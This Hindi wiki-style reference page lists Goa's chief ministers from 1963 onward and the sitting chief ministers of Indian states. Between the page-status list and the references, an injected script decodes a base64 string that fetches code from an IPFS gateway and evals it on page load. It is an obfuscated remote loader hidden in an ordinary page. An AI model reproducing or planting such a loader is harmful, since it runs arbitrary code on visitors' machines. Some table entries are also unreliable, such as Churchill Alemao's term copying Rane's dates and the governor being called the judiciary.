गोवा के मुख्यमंत्री

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
प्रमोद सावंत (मुख्यमंत्री, गोवा

गोवा के मुख्यमंत्री पश्चिम भारत के गोवा राज्य के सरकार के प्रमुख हैं। भारत के संविधान के अनुसार, गोवा के राज्यपाल राज्य के न्यायपालिक हैंं, लेकिन वास्तविक कार्यकारी प्राधिकारी मुख्यमंत्री है। गोवा विधान सभा के चुनावों के बाद राज्यपाल आमतौर पर सरकार बनाने के लिए बहुसंख्य पक्ष (या गठबंधन) को आमंत्रित करता है। राज्यपाल मुख्यमंत्री को नियुक्त करता है, जिनका मंत्रिमंडल सामूहिक रूप से विधानसभा के लिए जिम्मेदार है। मुख्यमंत्री का कार्यकाल पांच साल के लिए है और यह कोई अवधि सीमा नहीं है। वर्तमान में प्रमोद सावंत गोवा के मुख्यमंत्री हैं।

गोवा, दमन और दीव केंद्रशासित प्रदेश के मुख्यमंत्री
क्रमांक नाम कार्यकाल दल / पार्टी
1. दयानंद बांदोदकर 20 दिसम्बर, 1963 - 2 दिसम्बर, 1966 महाराष्ट्रवादी गोमंतक पार्टी
राष्ट्रपति शासन (2 दिसम्बर, 1966 - 5 अप्रॅल, 1967 तक)
(1.) दयानंद बांदोदकर 5 अप्रॅल, 1967 - 23 मार्च, 1972 महाराष्ट्रवादी गोमंतक पार्टी
(1.) दयानंद बांदोदकर 23 मार्च, 1972 - 12 अगस्त, 1973 महाराष्ट्रवादी गोमंतक पार्टी
2. शशिकला काकोदकर 12 अगस्त, 1973 - 7 जून, 1977 महाराष्ट्रवादी गोमंतक पार्टी
(2.) शशिकला काकोदकर 7 जून, 1977 - 27 अप्रॅल, 1979 महाराष्ट्रवादी गोमंतक पार्टी
राष्ट्रपति शासन (27 अप्रॅल, 1979 - 16 जनवरी, 1980 तक)
3. प्रतापसिंह राणे 16 जनवरी, 1980 - 7 जनवरी, 1985 भारतीय राष्ट्रीय कांग्रेस
(3.) प्रतापसिंह राणे 7 जनवरी, 1985 - 30 मई, 1987 भारतीय राष्ट्रीय कांग्रेस
गोवा के मुख्यमंत्रियों की सूची
क्रमांक नाम कार्यकाल दल / पार्टी
(3.) प्रतापसिंह राणे 30 मई, 1987 - 9 जनवरी, 1990 भारतीय राष्ट्रीय कांग्रेस
(3.) प्रतापसिंह राणे 9 जनवरी, 1990 - 27 मार्च, 1990 भारतीय राष्ट्रीय कांग्रेस
4. चर्चिल अलेमाओ 30 मई, 1987 - 9 जनवरी, 1990 प्रोग्रेसिव डेमोक्रेटिक फ्रंट (गोवा)
5. लुइस प्रोतो बार्बोसा 14 अप्रॅल, 1990 - 14 दिसंबर, 1990 प्रोग्रेसिव डेमोक्रेटिक फ्रंट (गोवा)
राष्ट्रपति शासन (14 दिसंबर, 1990 - 25 जनवरी, 1991)
6. रवि नाइक 25 जनवरी, 1991 - 18 मई, 1993 भारतीय राष्ट्रीय कांग्रेस
7. विल्फ़्रेड डिसूजा 18 मई, 1993 - 2 अप्रॅल, 1994 भारतीय राष्ट्रीय कांग्रेस
(6.) रवी नाईक 2 अप्रॅल, 1994 - 8 अप्रॅल, 1994 भारतीय राष्ट्रीय कांग्रेस
(7.) विल्फ़्रेड डिसूजा 8 अप्रॅल, 1994 - 16 दिसंबर, 1994 भारतीय राष्ट्रीय कांग्रेस
(3.) प्रतापसिंह राणे 16 दिसंबर, 1994 - 29 जुलाई, 1998 भारतीय राष्ट्रीय कांग्रेस
(7.) विल्फ़्रेड डिसूजा 29 जुलाई, 1998 - 23 नवंबर, 1998 गोवा राजीव कांग्रेस पार्टी
8. लुइज़िन्हो फ़लेरो 26 नवंबर, 1998 - 8 फ़रवरी, 1999 भारतीय राष्ट्रीय कांग्रेस
राष्ट्रपति शासन (10 फ़रवरी, 1999 - 9 जून, 1999)
(8.) लुइज़िन्हो फ़लेरो 9 जून, 1999 - 24 नवम्बर, 1999 भारतीय राष्ट्रीय कांग्रेस
9. फ़्राँसिस्को सार्डिन्हा 24 नवम्बर, 1999 - 23 अक्टूबर, 2000 गोवा पीपल्स कांग्रेस
10. मनोहर पर्रीकर 24 अक्टूबर, 2000 - 3 जून, 2002 भारतीय जनता पार्टी
(10.) मनोहर पर्रीकर 3 जून, 2002 - 2 फ़रवरी, 2005 भारतीय जनता पार्टी
(3.) प्रतापसिंह राणे 2 फ़रवरी, 2005 - 4 मार्च, 2005 भारतीय राष्ट्रीय कांग्रेस
राष्ट्रपति शासन (4 मार्च, 2005 - 7 जून, 2005)
(3.) प्रतापसिंह राणे 7 जून, 2005 - 8 जून, 2007 भारतीय राष्ट्रीय कांग्रेस
11. दिगंबर कामत 8 जून, 2007 - 9 मार्च, 2012 भारतीय राष्ट्रीय कांग्रेस
(10.) मनोहर पर्रीकर 9 मार्च, 2012 - 8 नवंबर, 2014 भारतीय जनता पार्टी
12. लक्ष्मीकांत पारसेकर 8 नवंबर, 2014 - 14 मार्च, 2017 भारतीय जनता पार्टी
(10.) मनोहर पर्रीकर 14 मार्च, 2017 - 17 मार्च, 2019 भारतीय जनता पार्टी
13. प्रमोद सावंत 19 मार्च, 2019 से पदस्थ भारतीय जनता पार्टी
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
Pema-Khandu.jpg
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
Himanta-Biswa-Sarma.jpg
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
Y-S-Jaganmohan-Reddy.jpg
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
Yogi-Adityanath-1.jpg
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
Pushkar-Singh-Dhami.jpg
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
Naveen-Patnaik.jpg
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
Siddaramaiah.jpg
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
Pinarayi Vijayan.jpg
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
Bhupendra-Patel.jpg
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
Pramod-Sawant.jpg
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
Vishnu-Deo-Sai.jpg
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
Hemant-Soren.JPG
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
M-K-Stalin.jpg
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
Manik-Saha.jpeg
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
Revanth-Reddy.jpg
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
KEJRIWAL.jpg
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
Neiphiu-Rio.jpg
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
Bhagwant-Mann.jpg
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
Mamata Banerjee.jpg
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
N-Rangasamy.jpg
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
Nitish-Kumar-1.jpg
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
N.Biren-Singh-1.jpg
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
Mohan-Yadav.jpg
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
Eknath-Shinde.jpg
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
Lalduhoma.jpg
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
Conrad-Sangma-1.jpg
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
Bhajan-Lal-Sharma.jpg
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
Prem-Singh-Tamang.jpg
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
Nayab-Singh-Saini.jpg
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
Sukhvinder-Singh-Sukhu.jpg
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022